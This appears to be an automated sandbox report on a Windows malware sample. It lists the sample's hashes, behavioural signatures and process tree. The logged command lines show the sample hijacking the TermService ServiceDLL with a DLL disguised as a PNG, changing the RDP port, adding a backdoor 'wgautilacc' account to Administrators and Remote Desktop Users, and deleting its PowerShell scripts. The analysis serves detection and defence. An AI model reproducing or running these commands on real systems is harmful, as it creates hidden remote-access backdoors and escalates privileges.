Analysis
-
max time kernel
38s
-
max time network
110s
-
platform
windows10_x64
-
resource
win10v20201028
-
submitted
08-11-2020 17:47
Static task
static1
Behavioral task
behavioral1
Sample
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
Resource
win10v20201028
General
-
Target
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
-
Size
3.1MB
-
MD5
c9cc3da6e84aedbd74218e5edea5d039
-
SHA1
f7b3f452245571dfe0906f417cf1cf1097d5cc44
-
SHA256
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45
-
SHA512
fb33da351c2f8e68dfcf32f373f2894ef1fd7ad523aa85426231eaf5412d63a47a12ef078f3e56e124676d787f6d71139cec377fa60c7ba7ce255f5d4b18f7fe
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
3796
3796
-
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
-
Drops file in Windows directory 8 IoCs
Processes:
powershell.exe
description | ioc | process
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exe powershell.exe powershell.exe powershell.exe
pid | process
572 | powershell.exe
572 | powershell.exe
572 | powershell.exe
2144 | powershell.exe
2144 | powershell.exe
2144 | powershell.exe
3920 | powershell.exe
3920 | powershell.exe
3920 | powershell.exe
2840 | powershell.exe
2840 | powershell.exe
2840 | powershell.exe
572 | powershell.exe
572 | powershell.exe
572 | powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
636
636
-
Suspicious use of AdjustPrivilegeToken 67 IoCs
-
Suspicious use of WriteProcessMemory 70 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
"C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe"
1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp" "c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMP"
4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
-
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
-
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc X1x9MXvy /add
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user wgautilacc X1x9MXvy /add
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc X1x9MXvy /add
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc X1x9MXvy
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user wgautilacc X1x9MXvy
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc X1x9MXvy
3⤵
-
C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
-
C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
-
C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.dll
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdline
-
\Windows\Branding\mediasrv.png
-
\Windows\Branding\mediasvc.png